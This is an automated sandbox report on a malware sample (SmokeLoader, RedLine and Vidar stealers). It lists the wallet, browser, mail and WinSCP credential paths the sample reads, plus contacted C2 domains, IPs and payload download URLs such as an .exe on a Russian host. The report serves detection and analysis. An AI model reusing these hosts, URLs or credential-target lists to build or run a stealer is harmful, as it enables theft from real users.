Source: C:\Users\user\AppData\Local\Temp\37F1.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5487.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5487.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5487.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\AppData\Local\Temp\5487.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5487.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_00412A15 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 12_2_00412A15

Stealing of Sensitive Information
barindex
Yara detected RedLine Stealer
Source: Yara match File source: 12.2.37F1.exe.4a8b076.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.37F1.exe.7290000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.37F1.exe.7290000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.37F1.exe.4b70ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.37F1.exe.5f55530.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.37F1.exe.5f56418.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.37F1.exe.4a8a18e.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.37F1.exe.5f56418.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.37F1.exe.2eb9e80.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.37F1.exe.48d0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.37F1.exe.5f8cf50.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.37F1.exe.4910000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.37F1.exe.2eb9e80.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.37F1.exe.5f8cf50.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.37F1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.37F1.exe.4b70000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.37F1.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.37F1.exe.4b70ee8.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.37F1.exe.5f55530.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.37F1.exe.4a8a18e.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.37F1.exe.4b70000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.37F1.exe.4a8b076.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.549799190.0000000005F55000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.417269957.0000000004910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.531865007.0000000000400000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.545785192.0000000004B70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.544624082.0000000004A4A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.550663724.0000000007290000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.542826089.00000000048D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.426623227.0000000002EB9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 37F1.exe PID: 1760, type: MEMORYSTR
Yara detected CryptOne packer
Source: Yara match File source: 00000011.00000002.469185788.0000000004FF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Yara detected SmokeLoader
Source: Yara match File source: 11.3.uucbfdt.720000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.700e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.0.gecbfdt.700e67.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.uucbfdt.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.2.gecbfdt.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.405E.exe.810e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.2.gecbfdt.700e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.0.gecbfdt.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.file.exe.710000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.0.gecbfdt.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.uucbfdt.710e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.3.405E.exe.820000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.405E.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.3.gecbfdt.710000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.0.gecbfdt.700e67.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.356712809.0000000000710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.505978851.0000000000710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.356833950.0000000000841000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.504789684.0000000000760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.475515508.0000000000720000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.403897156.0000000000820000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.255442832.0000000000710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.443176510.0000000000820000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.505917720.0000000002231000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.443497890.0000000000851000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.345197591.0000000004E61000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
Yara detected Vidar stealer
Source: Yara match File source: Process Memory Space: 5487.exe PID: 1272, type: MEMORYSTR
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\SysWOW64\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Found many strings related to Crypto-Wallets (likely being stolen)
Source: 5487.exe, 00000012.00000002.515198099.0000000002350000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Electrum\wallets\
Source: 5487.exe, 00000012.00000002.513831568.00000000009B3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\ElectronCash\wallets\default_wallethI
Source: 5487.exe, 00000012.00000002.515198099.0000000002350000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Electrum\wallets\
Source: 5487.exe, 00000012.00000002.515243787.0000000002355000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Jaxx_Desktop_Old
Source: 5487.exe, 00000012.00000002.515198099.0000000002350000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
Source: 5487.exe, 00000012.00000002.515198099.0000000002350000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: exodus.conf.json
Source: 5487.exe, 00000012.00000002.513831568.00000000009B3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\passphrase.jsonxJ
Source: 5487.exe, 00000012.00000002.515198099.0000000002350000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: info.seco
Source: 5487.exe, 00000012.00000002.515198099.0000000002350000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ElectrumLTC
Source: 5487.exe, 00000012.00000002.515243787.0000000002355000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \jaxx\Local Storage\
Source: 5487.exe, 00000012.00000002.513831568.00000000009B3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\passphrase.jsonxJ
Source: 5487.exe, 00000012.00000002.515198099.0000000002350000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Ethereum\
Source: 5487.exe, 00000012.00000002.515243787.0000000002355000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: xodus\exodus.w
Source: 5487.exe, 00000012.00000002.515243787.0000000002355000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: file__0.localstorage
Source: 5487.exe, 00000012.00000002.513831568.00000000009B3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\ElectronCash\wallets\default_wallethI
Source: 5487.exe, 00000012.00000002.515198099.0000000002350000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Ethereum\
Source: 5487.exe, 00000012.00000002.515243787.0000000002355000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: multidoge.wallet
Source: 5487.exe, 00000012.00000002.513831568.00000000009B3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\passphrase.jsonxJ
Source: 5487.exe, 00000012.00000002.515198099.0000000002350000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: seed.seco
Source: 37F1.exe, 0000000C.00000002.549799190.0000000005F55000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: set_UseMachineKeyStore
Source: 5487.exe, 00000012.00000002.515198099.0000000002350000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Electrum-LTC\wallets\
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5487.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\AppData\Local\Temp\5487.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5487.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5487.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5487.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5487.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5487.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5487.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5487.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5487.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5487.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5487.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5487.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5487.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5487.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5487.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5487.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5487.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5487.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\ Jump to behavior
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\5487.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 00000012.00000002.515243787.0000000002355000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 5487.exe PID: 1272, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected RedLine Stealer
Source: Yara match File source: 12.2.37F1.exe.4a8b076.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.37F1.exe.7290000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.37F1.exe.7290000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.37F1.exe.4b70ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.37F1.exe.5f55530.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.37F1.exe.5f56418.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.37F1.exe.4a8a18e.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.37F1.exe.5f56418.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.37F1.exe.2eb9e80.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.37F1.exe.48d0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.37F1.exe.5f8cf50.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.37F1.exe.4910000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.37F1.exe.2eb9e80.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.37F1.exe.5f8cf50.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.37F1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.37F1.exe.4b70000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.37F1.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.37F1.exe.4b70ee8.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.37F1.exe.5f55530.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.37F1.exe.4a8a18e.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.37F1.exe.4b70000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.37F1.exe.4a8b076.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.549799190.0000000005F55000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.417269957.0000000004910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.531865007.0000000000400000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.545785192.0000000004B70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.544624082.0000000004A4A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.550663724.0000000007290000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.542826089.00000000048D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.426623227.0000000002EB9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 37F1.exe PID: 1760, type: MEMORYSTR
Yara detected CryptOne packer
Source: Yara match File source: 00000011.00000002.469185788.0000000004FF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Yara detected SmokeLoader
Source: Yara match File source: 11.3.uucbfdt.720000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.700e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.0.gecbfdt.700e67.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.uucbfdt.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.2.gecbfdt.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.405E.exe.810e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.2.gecbfdt.700e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.0.gecbfdt.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.file.exe.710000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.0.gecbfdt.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.uucbfdt.710e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.3.405E.exe.820000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.405E.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.3.gecbfdt.710000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.0.gecbfdt.700e67.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.356712809.0000000000710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.505978851.0000000000710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.356833950.0000000000841000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.504789684.0000000000760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.475515508.0000000000720000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.403897156.0000000000820000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.255442832.0000000000710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.443176510.0000000000820000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.505917720.0000000002231000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.443497890.0000000000851000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.345197591.0000000004E61000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
Yara detected Vidar stealer
Source: Yara match File source: Process Memory Space: 5487.exe PID: 1272, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 736968 Sample: file.exe Startdate: 03/11/2022 Architecture: WINDOWS Score: 100 66 o3npxslymcyfi2.com 2->66 68 o3b1wk8sfk74tf.com 2->68 80 Snort IDS alert for network traffic 2->80 82 Malicious sample detected (through community Yara rule) 2->82 84 Antivirus detection for URL or domain 2->84 86 12 other signatures 2->86 10 file.exe 2->10         started        13 uucbfdt 2->13         started        15 gecbfdt 2->15         started        signatures3 process4 signatures5 118 Detected unpacking (changes PE section rights) 10->118 120 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 10->120 122 Maps a DLL or memory area into another process 10->122 124 Creates a thread in another existing process (thread injection) 10->124 17 explorer.exe 18 10->17 injected 126 Multi AV Scanner detection for dropped file 13->126 128 Machine Learning detection for dropped file 13->128 130 Checks if the current machine is a virtual machine (disk enumeration) 13->130 22 WerFault.exe 15->22         started        process6 dnsIp7 60 185.174.137.70, 49705, 80 SUPERSERVERSDATACENTERRU Russian Federation 17->60 62 o3zxuhcc4hl9mi.com 87.251.79.105, 49714, 49715, 49716 RISS-ASRU Russian Federation 17->62 64 5 other IPs or domains 17->64 50 C:\Users\user\AppData\Roaming\uucbfdt, PE32 17->50 dropped 52 C:\Users\user\AppData\Roaming\gecbfdt, PE32 17->52 dropped 54 C:\Users\user\AppData\Local\Temp\5999.exe, PE32 17->54 dropped 56 7 other malicious files 17->56 dropped 88 System process connects to network (likely due to code injection or exploit) 17->88 90 Benign windows process drops PE files 17->90 92 Injects code into the Windows Explorer (explorer.exe) 17->92 94 3 other signatures 17->94 24 405E.exe 17->24         started        27 5487.exe 20 17->27         started        31 explorer.exe 6 17->31         started        33 6 other processes 17->33 file8 signatures9 process10 dnsIp11 96 Multi AV Scanner detection for dropped file 24->96 98 Detected unpacking (changes PE section rights) 24->98 100 Machine Learning detection for dropped file 24->100 116 4 other signatures 24->116 74 t.me 149.154.167.99, 443, 49707 TELEGRAMRU United Kingdom 27->74 76 95.217.246.41, 49708, 80 HETZNER-ASDE Germany 27->76 58 C:\ProgramData\sqlite3.dll, PE32 27->58 dropped 102 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 27->102 104 Tries to harvest and steal browser information (history, passwords, etc) 27->104 106 Tries to steal Crypto Currency Wallets 27->106 35 cmd.exe 27->35         started        78 starvestitibo.org 31->78 108 System process connects to network (likely due to code injection or exploit) 31->108 110 Tries to steal Mail credentials (via file / registry access) 31->110 112 Detected unpacking (overwrites its own PE header) 33->112 114 Injects a PE file into a foreign processes 33->114 37 5999.exe 33->37         started        40 WerFault.exe 33->40         started        42 regsvr32.exe 33->42         started        44 WerFault.exe 33->44         started        file12 signatures13 process14 dnsIp15 46 conhost.exe 35->46         started        48 timeout.exe 35->48         started        70 api.2ip.ua 162.0.217.254, 443, 49713 ACPCA Canada 37->70 72 192.168.2.1 unknown unknown 40->72 process16
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.174.137.70
 unknown Russian Federation
50113 SUPERSERVERSDATACENTERRU true
87.251.79.105
 o3l3roozuidudu.com Russian Federation
20803 RISS-ASRU true
193.106.191.15
 starvestitibo.org Russian Federation
42238 BOSPOR-ASRU false
162.0.217.254
 api.2ip.ua Canada
35893 ACPCA false
91.195.240.101
 furubujjul.net Germany
47846 SEDO-ASDE false
95.217.246.41
 unknown Germany
24940 HETZNER-ASDE false
185.220.204.64
 shingroup.com Israel
41436 CLOUDWEBMANAGE-EUGB true
149.154.167.99
 t.me United Kingdom
62041 TELEGRAMRU false

Private

IP
192.168.2.1

Contacted Domains

Name IP Active
o3l3roozuidudu.com 87.251.79.105 true
o3b1wk8sfk74tf.com 87.251.79.105 true
shingroup.com 185.220.204.64 true
t.me 149.154.167.99 true
o3npxslymcyfi2.com 87.251.79.105 true
api.2ip.ua 162.0.217.254 true
o36fafs3sn6xou.com 87.251.79.105 true
furubujjul.net 91.195.240.101 true
starvestitibo.org 193.106.191.15 true
o3zxuhcc4hl9mi.com 87.251.79.105 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://hulimudulinu.net/ true
  • URL Reputation: safe
  • URL Reputation: safe
 unknown
http://stalnnuytyt.org/ true
  • URL Reputation: safe
 unknown
http://95.217.246.41/1752 true
  • Avira URL Cloud: malware
 unknown
http://185.174.137.70/s.exe true
  • Avira URL Cloud: malware
 unknown
http://liubertiyyyul.net/ true
  • URL Reputation: safe
 unknown
78.153.144.3:2510 true
  • Avira URL Cloud: malware
 unknown
http://guluiiiimnstra.net/ true
  • URL Reputation: safe
 unknown
http://95.217.246.41/ true
  • Avira URL Cloud: malware
 unknown
http://gulutina49org.org/ true
  • URL Reputation: safe
 unknown
http://starvestitibo.org/ true
  • URL Reputation: safe
 unknown
https://t.me/truemansho false
    		high
    http://nuluitnulo.me/ true
    • URL Reputation: safe
    		 unknown
    http://95.217.246.41/815243149147.zip true
    • Avira URL Cloud: malware
    		 unknown
    http://bururutu44org.org/ true
    • URL Reputation: safe
    		 unknown
    http://nvulukuluir.net/ true
    • URL Reputation: safe
    		 unknown
    http://furubujjul.net/ true
    • URL Reputation: safe
    		 unknown
    https://api.2ip.ua/geo.json false
      		high
      http://youyouumenia5.org/ true
      • URL Reputation: safe
      		 unknown